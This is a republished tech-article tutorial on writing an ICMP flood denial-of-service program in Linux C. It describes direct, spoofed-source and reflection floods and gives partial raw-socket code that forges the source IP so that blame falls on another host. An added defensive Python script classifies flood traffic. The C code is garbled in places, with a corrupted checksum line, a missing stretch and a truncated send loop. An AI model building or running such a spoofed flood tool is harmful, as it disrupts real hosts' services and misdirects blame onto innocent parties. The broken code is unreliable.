2025-04-06 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article explains, with a worked example, how ICMP flood attacks are built in Linux programming. The editor thinks it is very practical, so I share it with you as a reference. I hope you get something out of it after reading this article.
An ICMP flood attack is one of the best-known DoS (Denial of Service) attacks and one of the attack methods hackers like most. Here, in order to deepen our understanding of ICMP, we also try to write a small ICMP flood attack program based on ICMP.
A flood attack (FLOOD ATTACK) is the network behavior of using computer network technology to send a large number of useless data packets to the destination host, so that the destination host is kept busy with useless packets and cannot provide its normal services.
ICMP flood attack: as the name implies, a flood of ping packets is sent to the destination host, keeping it so busy with ping packets that it cannot handle other normal requests; it is like drowning the destination host in ping packets.
To implement an ICMP flood attack, you need the following three areas of knowledge:
The principle of DoS attacks
An in-depth understanding of ICMP
Programming skills with raw sockets
1. The principle of ICMP flood attacks
ICMP flood attacks are built on top of ping, but ping programs rarely cause the destination host to go down. This is because ping sends packets too slowly. For example, in my PING program the sending rate is limited to one packet per second, which leaves the destination host more than enough capacity to process the ping packets. Therefore, in order to cause the "flood" phenomenon, the packet sending rate has to be increased. Here are three ways to carry out an ICMP flood:
(1) Direct flood attack
This requires comparing the bandwidth of the local host with the bandwidth of the destination host. For example, if my host's network bandwidth is 30M while your host's network bandwidth is only 3M, then my flood against your host has a high success rate. This kind of attack requires that the processing power and bandwidth of the attacking host be greater than those of the attacked host; otherwise the attacking host is the one that ends up overloaded. Based on this idea, a high-bandwidth, high-performance computer can use multithreading to send many ICMP request messages at a time, keeping the destination host busy processing a large number of these messages and causing slowdowns or even downtime. A big disadvantage of this method is that the other party can block the attack source by the source IP address of the ICMP packets, so that the attack cannot continue.
(2) Spoofed-IP attack
On the basis of the direct flood attack, we disguise the sender's IP address as another IP. If it is disguised as a random IP, we hide our location very well. If we disguise our IP as the IP of another victim, it creates a situation of "sowing discord": the ICMP reply packets from victim host 1 will also flood victim host 2. If the administrator of host 1 wants to find out who is sending the packets that attack him, he checks the source address of the ICMP packets, which turns out to be host 2, so host 2 becomes the scapegoat.
(3) Reflection attack
The idea of this kind of attack is different from the two above, and the design of the reflection attack is more ingenious. In fact, method 3 here is a combined and upgraded version of the first two methods, and its attack strategy is a bit like "borrowing a knife": the reflection attack is no longer aimed directly at the target host, but makes other hosts mistakenly believe that the target host is sending them ICMP request packets, so that a group of hosts sends ICMP response packets to the destination host and floods it from all directions. For example, we send ICMP request packets to other hosts in the local area network with our source IP address disguised as the IP of the destination host, so that the destination host becomes the focus of all the ICMP echo replies. This attack is very covert, because it is difficult for the victim host to find out who the source of the attack is.
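From the defender's side, the three variants above leave different fingerprints in ICMP traffic: a direct flood arrives from a single source, a spoofed flood from many (often random) sources, and a reflection flood shows up as echo replies that the host never asked for. The following Python script, an added example that is not part of the original article, classifies one-second buckets of constructed (second, src, dst, type) packet summaries along those lines; the thresholds, ratios and addresses are assumptions.

```python
from collections import defaultdict

ECHO_REPLY, ECHO_REQUEST = 0, 8

def build_sample():
    """Constructed ICMP summaries (second, src_ip, dst_ip, icmp_type); not a real capture."""
    recs = [(0, "10.0.0.9", "10.0.0.5", ECHO_REQUEST)] * 200          # direct flood, one source
    recs += [(0, f"172.16.0.{i}", "10.0.0.6", ECHO_REQUEST) for i in range(1, 201)]  # forged sources
    recs += [(0, f"10.0.1.{i}", "10.0.0.7", ECHO_REPLY) for i in range(1, 201)]      # reflected replies
    recs += [(s, "10.0.0.2", "10.0.0.8", ECHO_REQUEST) for s in range(3)]  # benign 1 pps ping
    recs += [(s, "10.0.0.8", "10.0.0.2", ECHO_REPLY) for s in range(3)]
    return recs

def classify(records, pps_threshold=100, spoof_ratio=0.5):
    """Label (dst, second) buckets above pps_threshold: direct (one source),
    spoofed-source (mostly distinct forged sources) or reflection (echo
    replies to a host that sent almost no requests). Returns {(dst, sec): label}."""
    req_srcs = defaultdict(list)   # (dst, sec) -> sources of echo requests received
    replies = defaultdict(int)     # (dst, sec) -> echo replies received
    own_reqs = defaultdict(int)    # (host, sec) -> echo requests the host itself sent
    for sec, src, dst, itype in records:
        if itype == ECHO_REQUEST:
            req_srcs[(dst, sec)].append(src)
            own_reqs[(src, sec)] += 1
        elif itype == ECHO_REPLY:
            replies[(dst, sec)] += 1
    verdicts = {}
    for key, srcs in req_srcs.items():
        if len(srcs) < pps_threshold:
            continue
        distinct = len(set(srcs))
        if distinct == 1:
            verdicts[key] = "direct flood"
        elif distinct / len(srcs) >= spoof_ratio:
            verdicts[key] = "spoofed-source flood"
        else:
            verdicts[key] = "multi-source flood"
    for (dst, sec), n in replies.items():
        # Replies vastly outnumbering the host's own requests mean someone
        # else used its address as the source, i.e. a reflection attack.
        if n >= pps_threshold and n > 10 * own_reqs[(dst, sec)]:
            verdicts[(dst, sec)] = "reflection flood"
    return verdicts

if __name__ == "__main__":
    for key, label in sorted(classify(build_sample()).items()):
        print(f"{key[0]} at t={key[1]}s: {label}")
```

On a real sensor the same bucketing can be fed from a packet-capture summary; a rate limit on ICMP at the edge and ignoring broadcast echo requests blunt the direct and reflection cases respectively.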
2. ICMP flood attack program design
Here I want to implement an example of an ICMP flood attack, and I choose method 2 for the design. Although the "borrowed knife" of method 3 is more ingenious, it is just a further extension of the spoofing in method 2, and its implementation is much the same.
First, the model diagram of the attack is given:
1. Assembling the ICMP packet
The packet assembly here is not much different from that in the PING program; the only thing to note is that we must fill in the IP header ourselves, because we need to forge the source address so that the blame lands on someone else.
    void DoS_icmp_pack(char* packet)
    {
        struct ip* ip_hdr = (struct ip*)packet;
        struct icmp* icmp_hdr = (struct icmp*)(packet + sizeof(struct ip));

        ip_hdr->ip_v = 4;
        ip_hdr->ip_hl = 5;
        ip_hdr->ip_tos = 0;
        ip_hdr->ip_len = htons(ICMP_PACKET_SIZE);
        ip_hdr->ip_id = htons(getpid());
        ip_hdr->ip_off = 0;
        ip_hdr->ip_ttl = 64;
        ip_hdr->ip_p = PROTO_ICMP;
        ip_hdr->ip_sum = 0;
        ip_hdr->ip_src.s_addr = inet_addr(FAKE_IP);   /* camouflage the source address */
        ip_hdr->ip_dst.s_addr = dest;                 /* enter the destination host address */

        icmp_hdr->icmp_type = ICMP_ECHO;
        icmp_hdr->icmp_code = 0;
        icmp_hdr->icmp_cksum = htons(~(ICMP_ECHO /* ... the rest of this line is garbled in the source ... */

    /* ... the end of DoS_icmp_pack() and the start of main() are missing from the source ... */

        dest = inet_addr(argv[1]);
        if (dest == INADDR_NONE) {
            host = gethostbyname(argv[1]);
            if (host == NULL) {
                printf("Invalid IP or Domain name!\n");
                return -1;
            }
            memcpy((char*)&dest, host->h_addr, host->h_length);
        }
        rawsock = socket(AF_INET, SOCK_RAW, PROTO_ICMP);
        if (rawsock < 0) {
            printf("Fail to create socket!\n");
            return -1;
        }
        setsockopt(rawsock, SOL_IP, IP_HDRINCL, "1", sizeof("1"));
        printf("ICMP FLOOD ATTACK START\n");
        for
    /* ... the source text is truncated here ... */